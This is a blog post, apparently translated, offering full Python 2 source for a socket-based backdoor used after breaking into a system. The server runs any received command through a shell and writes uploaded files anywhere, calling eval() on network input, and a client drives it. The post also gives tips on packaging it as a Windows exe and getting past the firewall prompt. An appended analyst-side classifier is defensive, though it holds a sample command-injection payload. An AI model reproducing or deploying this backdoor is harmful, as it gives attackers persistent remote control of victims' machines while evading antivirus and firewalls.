After gaining access to a system, when you want to keep that access or do port forwarding, you would normally reach for port-forwarding tools such as nc, ew or lcx.
But tools of this backdoor-like kind are frequently flagged by antivirus, and it is not unusual for them to carry backdoors themselves; I have personally had the experience of creating an account after getting system privileges, only to find that before long someone else had planted other hidden accounts.
So, since I can write some code, here is a simple backdoor script built on socket communication.
Server side:
# coding:utf-8
import socket
import subprocess

# server
def server_main(port):
    server = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        server.bind(("0.0.0.0", port))
        server.listen(5)
        print "[*] Listening on %s:%d" % (socket.gethostname(), port)
        while True:
            # one request per connection: the client sends, reads the reply and disconnects
            conn, addr = server.accept()
            buf = conn.recv(4096)
            print "[*] recv command = %s" % buf
            if len(buf) != 0:
                if is_file(buf):
                    rev = upload(buf)
                else:
                    rev = run_command(buf)
                conn.send(rev)
            conn.close()
    except:
        print "Exception!"

def is_file(buf):
    # an upload request arrives as the repr() of a dict; anything else is a command
    try:
        if isinstance(eval(buf), dict):
            return True
    except:
        return False
    return False

def run_command(command):
    command = command.strip()
    try:
        p = subprocess.Popen(command, stdin=subprocess.PIPE, stdout=subprocess.PIPE,
                             stderr=subprocess.PIPE, shell=True)
        out, err = p.communicate()
    except:
        out = "Fail to execute command!"
    return out

def upload(data):
    try:
        req = eval(data)
        path = req['path']        # destination path on this host
        content = req['request']  # raw file contents sent by the client
        with open(path, 'wb') as f:
            f.write(content)
        return "OK"
    except:
        return "Fail"

if __name__ == "__main__":
    port = raw_input("PORT = ")
    server_main(int(port))
Client side:
# coding:utf-8
import socket

# client
# use:
# >> command                                   e.g. >> whoami
# >> upload <local source file> <destination path on the server>
#                                              e.g. >> upload d:/a.txt e:/a.txt
def client(ips, data):
    resp = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        resp.settimeout(10)
        resp.connect(ips)
        resp.send(data)
        out = resp.recv(4096)
        resp.close()
    except:
        out = "Except Or Time out !"
    return out

def client_send(target, port):
    while True:
        data = raw_input(">> ")
        if 'upload' not in data:
            out = client((target, port), data)
            print "[*] Command Out= %s" % out
        else:
            upload((target, port), data)

def upload(ips, data):
    # "upload <source> <destination>" -> send {'path': destination, 'request': contents}
    parts = data.split(' ')
    list_a = {}
    name = parts[1].replace('\\', '/')
    list_a['path'] = parts[2]
    request = ''
    with open(name, 'rb') as f:
        for i in f.readlines():
            request += i
    list_a['request'] = request
    out = client(ips, str(list_a))
    if "OK" in out:
        print "[*] File Write Success !"
    else:
        print "[*] File Write Fail !"

if __name__ == "__main__":
    ip = raw_input("IP:PORT = ")
    list_a = ip.split(":")
    client_send(list_a[0], int(list_a[1]))
The code is simple. The catch is that it works as a forward (bind) connection: it opens a listening port on the server, so in some situations it needs fairly high privileges. Of course, that is also exactly what post-exploitation aims to obtain.
It can also be packaged into an exe with pyinstaller to run on Windows. With the firewall enabled you would then need to add a network allow rule, but in my testing, when the firewall prompt about the port appeared I simply closed the prompt window, and on the next run it worked normally. The firewall did not show any rule enabling this program, either. I do not yet know why.
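As an added example that is not part of the original post, here is the same dispatch decision seen from the analyst's side, in Python 3: given payloads captured from this protocol (constructed samples below, not real captures), it tells which branch of the server loop each one would take and recovers the destination path and size of an uploaded file. It uses ast.literal_eval, which only accepts Python literals, so nothing in the payload is executed, unlike the server's own isinstance(eval(buf), dict) check, which evaluates whatever arrives.

```python
import ast
import hashlib

# Constructed sample payloads, modelled on what the client above puts on the
# wire: a bare command, a complete upload request, an incomplete dict, and an
# expression that eval() would execute but literal_eval rejects.
SAMPLE_PAYLOADS = [
    b"whoami",
    b"{'path': 'e:/a.txt', 'request': 'hello world\\n'}",
    b"{'path': 'e:/a.txt'}",
    b"__import__('os').system('id')",
]

UPLOAD_KEYS = {"path", "request"}


def parse_upload_request(payload):
    """Return {'path', 'size', 'sha256'} for an upload request, else None."""
    try:
        obj = ast.literal_eval(payload.decode("utf-8", errors="replace"))
    except (ValueError, SyntaxError, MemoryError, RecursionError):
        return None  # not a Python literal: the server would shell it out
    if not isinstance(obj, dict) or set(obj) != UPLOAD_KEYS:
        return None
    if not isinstance(obj["path"], str) or not isinstance(obj["request"], str):
        return None
    # Python 2 str(dict) renders the file bytes as a text literal; recover them.
    content = obj["request"].encode("latin-1", errors="replace")
    return {
        "path": obj["path"],
        "size": len(content),
        "sha256": hashlib.sha256(content).hexdigest(),
    }


def dispatch_for(payload):
    """Which branch of the server's accept loop this payload would take:
    'upload', 'command', or None for an empty read (the server sends nothing)."""
    if len(payload) == 0:
        return None
    if parse_upload_request(payload) is not None:
        return "upload"
    return "command"  # everything else goes to run_command() via shell=True


def summarise(payloads=SAMPLE_PAYLOADS):
    """Pair each payload with its branch and, for uploads, the recovered file info."""
    return [(dispatch_for(p), parse_upload_request(p)) for p in payloads]
```

Bare commands carry no framing at all, so the dict-shaped upload request is the only strong on-wire signature of this tool; the command branch is simply everything else.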